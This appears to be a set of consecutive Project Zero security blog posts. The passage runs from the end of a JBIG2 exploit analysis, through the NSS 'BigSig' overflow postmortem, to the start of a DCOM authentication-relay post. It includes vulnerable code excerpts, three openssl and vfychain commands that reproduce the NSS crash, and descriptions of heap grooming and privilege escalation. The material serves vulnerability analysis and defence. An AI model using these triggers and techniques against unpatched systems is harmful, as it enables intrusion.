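    references = []   # one stored bitmap per group of similar-looking glyphs
    placements = []   # (x, y, index into references) for every glyph on the page
    for (x, y), bitmap in glyphs:
        for idx, ref in enumerate(references):
            if pixel_difference(ref, bitmap) <= threshold:
                break                      # close enough: reuse this reference glyph
        else:
            references.append(bitmap)      # nothing similar yet: store a new reference
            idx = len(references) - 1
        placements.append((x, y, idx))
    return references, placements


def decompress(references, placements, width, height):
    """Treat the page as a canvas and draw the reference glyph at each location."""
    canvas = [[0] * width for _ in range(height)]
    for x, y, idx in placements:
        for dy, row in enumerate(references[idx]):
            for dx, pixel in enumerate(row):
                canvas[y + dy][x + dx] |= pixel
    return canvas


# Two nearly identical 2x2 glyphs and one clearly different glyph.
glyph_a = ((1, 1), (1, 0))
glyph_b = ((1, 1), (1, 1))   # differs from glyph_a by a single pixel
glyph_c = ((0, 0), (0, 1))
page = [((0, 0), glyph_a), ((2, 0), glyph_b), ((4, 0), glyph_c)]

references, placements = compress(page)
canvas = decompress(references, placements, width=6, height=2)
```

Only two reference glyphs are stored for the three glyphs on the page, and the second glyph is redrawn as a copy of the first, which is exactly where the lossiness comes from.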

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.
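As a minimal sketch of that round trip, assuming bitmaps are represented as lists of rows of 0/1 pixels (a representation chosen here for illustration, not the JBIG2 encoding):

```python
def xor_bitmaps(a, b):
    """Pixel-wise XOR of two equally sized 1-bit bitmaps."""
    return [[pa ^ pb for pa, pb in zip(row_a, row_b)] for row_a, row_b in zip(a, b)]


substituted = [[1, 1, 0],
               [1, 0, 0],
               [1, 1, 0]]
original = [[1, 1, 0],
            [1, 0, 1],
            [1, 1, 0]]

# Encoder side: the mask records exactly the pixels that differ.
difference_mask = xor_bitmaps(substituted, original)

# Decoder side: XORing the mask back onto the substituted glyph restores the original.
recovered = xor_bitmaps(substituted, difference_mask)
```

Because XOR is its own inverse, the same operation serves both for computing the mask and for applying it.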

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a Huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)

  numSyms = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      error(errSyntaxError, getPos(),
            "Invalid segment reference in JBIG2 text region");
      delete codeTables;
      return;
    }
  }

...

  // get the symbol bitmaps
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k); // (4)
        }
      }
    }
  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.
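The arithmetic behind steps (1) to (4) can be modelled in Python by masking to 32 bits. The symbol dictionary sizes below are hypothetical values picked only so that the sum wraps; they are not taken from the exploit, and the 8-byte pointer size assumes a 64-bit target.

```python
UINT32_MASK = 0xFFFFFFFF
POINTER_SIZE = 8  # assumed sizeof(JBIG2Bitmap *) on a 64-bit target


def collate_num_syms(dict_sizes):
    """Mimic the repeated `numSyms +=` at (2) with 32-bit wraparound."""
    num_syms = 0
    for size in dict_sizes:
        num_syms = (num_syms + size) & UINT32_MASK
    return num_syms


# Hypothetical referenced symbol dictionary sizes whose true sum is 2**32 + 3.
dict_sizes = [0x80000000, 0x7FFFFFFF, 4]

num_syms = collate_num_syms(dict_sizes)          # wraps around to a small value
allocated_bytes = num_syms * POINTER_SIZE        # size requested at (3)
written_bytes = sum(dict_sizes) * POINTER_SIZE   # what the loop at (4) would write

print(num_syms, allocated_bytes, written_bytes)
```

With these inputs the allocation is 24 bytes while an unchecked copy loop would try to write a little over 32GB of pointers into it.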

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegment routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently, since JBIG2Bitmap inherits from JBIG2Segment, the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls). The returned type will no longer be equal to jbig2SegSymbolDict, however, so further writes at (4) are not reached, which bounds the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. All iOS hardware is little endian, so the w and line fields are likely to be overwritten with 0x1 (the most-significant half of a JBIG2Bitmap pointer), while the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer: a fairly random value, depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.
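To see why the fields end up with those values, here is a small Python sketch of how two 64-bit little-endian pointers land on four consecutive 32-bit fields. The field order (segNum, w, h, line) is assumed from the figure caption, and the pointer values are made up for illustration.

```python
import struct


def split_pointer(ptr):
    """Return the (lower-address, higher-address) 32-bit fields a 64-bit pointer overwrites."""
    low_half, high_half = struct.unpack("<II", struct.pack("<Q", ptr))
    return low_half, high_half


def overwrite_fields(ptr_a, ptr_b):
    """Model two pointers written over four adjacent 32-bit fields (assumed order)."""
    seg_num, w = split_pointer(ptr_a)
    h, line = split_pointer(ptr_b)
    return {"segNum": seg_num, "w": w, "h": h, "line": line}


# Hypothetical heap pointers in the second 4GB of the address space.
fields = overwrite_fields(0x123456780, 0x1ABCDEF00)
for name, value in fields.items():
    print(f"{name:>6} = {value:#x}")
```

The fields at the lower addresses (segNum and h) receive the unpredictable low halves, while w and line both become 0x1.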

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in JavaScript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary JavaScript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is Turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1, creating a NAND gate.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
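The construction is easy to check exhaustively. The following Python sketch builds NOT and NAND from AND and XOR as described, then rebuilds OR and AND from NAND alone; the function names are just labels chosen for this illustration.

```python
from itertools import product


def AND(a, b):
    return a & b


def XOR(a, b):
    return a ^ b


def NOT(a):
    """XORing with the constant 1 flips a bit."""
    return XOR(a, 1)


def NAND(a, b):
    """An AND gate feeding one input of an XOR gate whose other input is 1."""
    return NOT(AND(a, b))


# Universality in miniature: other gates rebuilt from NAND only.
def or_from_nand(a, b):
    return NAND(NAND(a, a), NAND(b, b))


def and_from_nand(a, b):
    return NAND(NAND(a, b), NAND(a, b))


for a, b in product((0, 1), repeat=2):
    print(a, b, NAND(a, b), or_from_nand(a, b), and_from_nand(a, b))
```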

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as JavaScript, but it's fundamentally computationally equivalent.
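To give a feel for what such a circuit involves, here is a Python sketch of a 64-bit ripple-carry adder and an equality comparator that combine bits using only AND, OR and XOR. This is a textbook construction, not the exploit's actual circuit design (which this post does not detail); the shifts merely pick out individual bits, which in the real setting would be separate memory locations.

```python
def full_adder(a, b, carry_in):
    """One-bit full adder using only XOR, AND and OR."""
    partial = a ^ b
    total = partial ^ carry_in
    carry_out = (a & b) | (partial & carry_in)
    return total, carry_out


def add64(x, y):
    """Add two 64-bit values one bit at a time, discarding the final carry."""
    result, carry = 0, 0
    for i in range(64):
        bit, carry = full_adder((x >> i) & 1, (y >> i) & 1, carry)
        result |= bit << i
    return result


def equal64(x, y):
    """Return 1 if all 64 bit pairs match, else 0."""
    any_difference = 0
    for i in range(64):
        any_difference |= ((x >> i) & 1) ^ ((y >> i) & 1)
    return any_difference ^ 1


print(hex(add64(0x1234, 0x1111)))
print(equal64(5, 5), equal64(5, 4))
```

Each loop iteration corresponds to a handful of gate evaluations, so a single 64-bit addition already costs a few hundred logical operations, which helps explain why the exploit needs tens of thousands of segment commands.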

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

This shouldn't have happened: A vulnerability postmortem

Posted by Tavis Ormandy, Project Zero

Introduction

This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.

In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.

First, let’s take a look at the bug. I’ll then explain how I found it and try to understand why we missed it for so long.

Analysis

Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.

struct VFYContextStr {
   SECOidTag hashAlg; /* the hash algorithm */
   SECKEYPublicKey *key;
   union {
       unsigned char buffer[1];
       unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];
       unsigned char ecdsasig[2 * MAX_ECKEY_LEN];
       unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];
   } u;
   unsigned int pkcs1RSADigestInfoLen;
   unsigned char *pkcs1RSADigestInfo;
   void *wincx;
   void *hashcx;
   const SECHashObject *hashobj;
   SECOidTag encAlg;    /* enc alg */
   PRBool hasSignature;
   SECItem *params;
};

Fig 1. The VFYContext structure from NSS.


The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.

Okay, but what happens if you just... make a signature that’s bigger than that?

Well, it turns out the answer is memory corruption. Yes, really.


The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.

The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:

# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,
# which contains function pointers (bigger would work too, but takes longer to generate).
$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key
$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...
$ vfychain -a bigsig.cer
Segmentation fault

Fig 2. Reproducing the BigSig vulnerability in three easy commands.
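The key size passed to openssl is simple arithmetic on the field widths quoted in the comment. As a quick sanity check in Python (the variable names are illustrative, and the widths are taken from the comment in Fig 2 rather than measured from a compiled structure):

```python
BUFFER_BITS = 16384                      # the fixed-size buffer, per the comment in Fig 2
FOLLOWING_FIELD_BITS = [32, 64, 64, 64]  # field widths listed in the same comment

key_bits = BUFFER_BITS + sum(FOLLOWING_FIELD_BITS)
signature_bytes = key_bits // 8          # an RSA signature is as long as the modulus
buffer_bytes = BUFFER_BITS // 8
overflow_bytes = signature_bytes - buffer_bytes

print(key_bits, signature_bytes, overflow_bytes)
```

So the generated signature is 2076 bytes long and runs 28 bytes past the end of the 2048-byte buffer.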

The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.

           case rsaPssKey:
               sigLen = SECKEY_SignatureLen(key);
               if (sigLen == 0) {
                   /* error set by SECKEY_SignatureLen */
                   rv = SECFailure;
                   break;
               }
               if (sig->len != sigLen) {
                   PORT_SetError(SEC_ERROR_BAD_SIGNATURE);
                   rv = SECFailure;
                   break;
               }
               PORT_Memcpy(cx->u.buffer, sig->data, sigLen);
               break;

Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.
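For contrast, here is a Python model of the same branch with the kind of length check that was absent. It is only an illustration of where such a check belongs, not the actual NSS patch: the function name copy_signature, the use of ValueError and the bytearray standing in for cx->u are all assumptions.

```python
MAX_SIGNATURE_BYTES = 2048  # size of the fixed buffer, as discussed for Fig 1


def copy_signature(buffer, sig, key_signature_len):
    """Copy sig into a fixed-size buffer, rejecting anything that does not fit."""
    if key_signature_len == 0:
        raise ValueError("invalid key")
    if len(sig) != key_signature_len:
        raise ValueError("bad signature")
    # The check missing from Fig 3: the length must also fit the destination.
    if key_signature_len > len(buffer):
        raise ValueError("signature larger than buffer")
    buffer[:key_signature_len] = sig


context_buffer = bytearray(MAX_SIGNATURE_BYTES)
copy_signature(context_buffer, b"A" * 256, 256)        # fits, copied

try:
    copy_signature(context_buffer, b"A" * 2076, 2076)  # oversized, rejected
    rejected = False
except ValueError:
    rejected = True
```

Python cannot corrupt adjacent memory the way PORT_Memcpy can, so the sketch only shows the control flow: both existing checks pass for an oversized signature, and only the third comparison stops it.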

I think this vulnerability raises a few immediate questions:

  • Was this a recent code change or regression that hadn’t been around long enough to be discovered? No, the original code was checked in with ECC support on 17 October 2003, but wasn't exploitable until some refactoring in June 2012. In 2017, RSA-PSS support was added and made the same error.

  • Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A’s works just fine.

  • Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed DER, that’s about it.

  • Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(), is vulnerable.

  • Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.

  • Is it unexploitable, or otherwise limited impact? No, the hashobj member can be clobbered. That object contains function pointers, which are used immediately.

This wasn’t a process failure; the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties and invest in memory safety, fuzzing and test coverage.

NSS was one of the very first projects included with oss-fuzz; it has been officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.

I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.

Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.

  • Did Mozilla have good test coverage for the vulnerable areas? YES.
  • Did Mozilla/Chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
  • Is there a mutator capable of extending ASN1_ITEMs? YES.
  • Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.

How did I find the bug?

I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.

Stack Coverage

The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.

#include <stdio.h>
#include <string.h>
#include <limits.h>

static char buf[128];

/* Deliberately vulnerable: a and b are untrusted when foo is dispatched directly. */
void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }
/* bar and baz only ever pass trusted parameters down to foo. */
void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }
void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

typedef void (* dispatch_t)(int, size_t);

/* One slot per possible byte value, so handlers[cmd] is always in range. */
dispatch_t handlers[UCHAR_MAX + 1] = {
    cmd_handler_foo,
    cmd_handler_bar,
    cmd_handler_baz,
};

int main(int argc, char **argv)
{
    int cmd;

    while ((cmd = getchar()) != EOF) {
        if (handlers[cmd]) {
            handlers[cmd](getchar(), getchar());
        }
    }
    return 0;
}

Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]

To solve this problem, I’ve been experimenting with monitoring the call stack during execution.

The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.
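The difference between the two metrics on the program in Fig 4 can be modelled in a few lines of Python. This is a deliberately simplified sketch: whole functions stand in for basic blocks, the greedy minimizer is one common strategy rather than any particular fuzzer's algorithm, and the input names are made up.

```python
def minimize(corpus):
    """Greedy corpus minimization: keep an input only if it adds unseen coverage."""
    kept, seen = [], set()
    # Visit inputs with the most coverage first.
    for name, coverage in sorted(corpus.items(), key=lambda item: -len(item[1])):
        if not coverage <= seen:
            kept.append(name)
            seen |= coverage
    return kept


def call_stacks(chain):
    """Every call stack observed while executing a chain of nested calls."""
    return {tuple(chain[:depth]) for depth in range(1, len(chain) + 1)}


# Call chains triggered by two hypothetical inputs to the program in Fig 4.
chains = {
    "foo_input": ["main", "cmd_handler_foo"],
    "bar_input": ["main", "cmd_handler_bar", "cmd_handler_foo"],
}

block_coverage = {name: set(chain) for name, chain in chains.items()}
stack_coverage = {name: call_stacks(chain) for name, chain in chains.items()}

print(minimize(block_coverage))   # the foo input is dropped
print(minimize(stack_coverage))   # both inputs survive
```

Under block coverage the foo input adds nothing new once the bar input is in the corpus, whereas under stack coverage the stack (main, cmd_handler_foo) is only ever produced by the foo input, so it is retained.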

Object Isolation

Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.

The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.
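As a rough idea of what isolating records involves for ASN.1, here is a minimal DER TLV walker in Python. It is not the fuzzer described here (which has not been published); it handles only single-byte tags and definite lengths, and the example bytes are a hand-built SEQUENCE containing an INTEGER and an OID.

```python
def parse_tlv(data, offset=0):
    """Parse one DER TLV and return (tag, value_bytes, next_offset)."""
    tag = data[offset]
    length = data[offset + 1]
    offset += 2
    if length & 0x80:
        # Long form: the low 7 bits give the number of length bytes that follow.
        num_length_bytes = length & 0x7F
        length = int.from_bytes(data[offset:offset + num_length_bytes], "big")
        offset += num_length_bytes
    value = data[offset:offset + length]
    if len(value) != length:
        raise ValueError("truncated TLV")
    return tag, value, offset + length


def isolate_records(data):
    """Yield (tag, raw_record) for every TLV, descending into constructed types."""
    offset = 0
    while offset < len(data):
        start = offset
        tag, value, offset = parse_tlv(data, offset)
        yield tag, data[start:offset]
        if tag & 0x20:  # constructed bit set: the value is itself a run of TLVs
            yield from isolate_records(value)


# SEQUENCE { INTEGER 5, OBJECT IDENTIFIER (6 content bytes) }
example = bytes.fromhex("300b020105" "06062a864886f70d")
records = list(isolate_records(example))
for tag, raw in records:
    print(f"tag {tag:#04x}: {raw.hex()}")
```

Each raw record is a self-contained byte string, so it can be saved on its own and later spliced into template data.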

Do these approaches work?

I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.

Lessons Learned

How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?

What went wrong

Issue #1 Missing end-to-end testing.

NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
 char *dest[2048];

 for (auto tpl : templates) {
   PORTCheapArenaPool pool;
   SECItem buf = {siBuffer, const_cast<unsigned char *>(Data),
                  static_cast<unsigned int>(Size)};

   PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE);
   // Decoded objects land in dest and are thrown away with the arena.
   (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf);
   PORT_DestroyCheapArena(&pool);
 }

 return 0;
}

Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly.

This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.

Issue #2 Arbitrary size limits.

There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.

A reasonable choice might be 2^24-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.

While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.

Issue #3 Misleading metrics.

All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.

This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.

What Worked

  • The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.

It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it was not today.

Recommendations

This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.

Short Term

  • Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 2^24-1 = 16,777,215 bytes.
  • The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
  • The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.

Solution

This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.

Credits

I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.

Thanks to the NSS team, who helped triage and analyze the vulnerability.


[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.

Windows Exploitation Tricks: Relaying DCOM Authentication

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to relay authentication from another user on the same machine and forward it to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of a DCOM authentication relay attack from issue 325

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

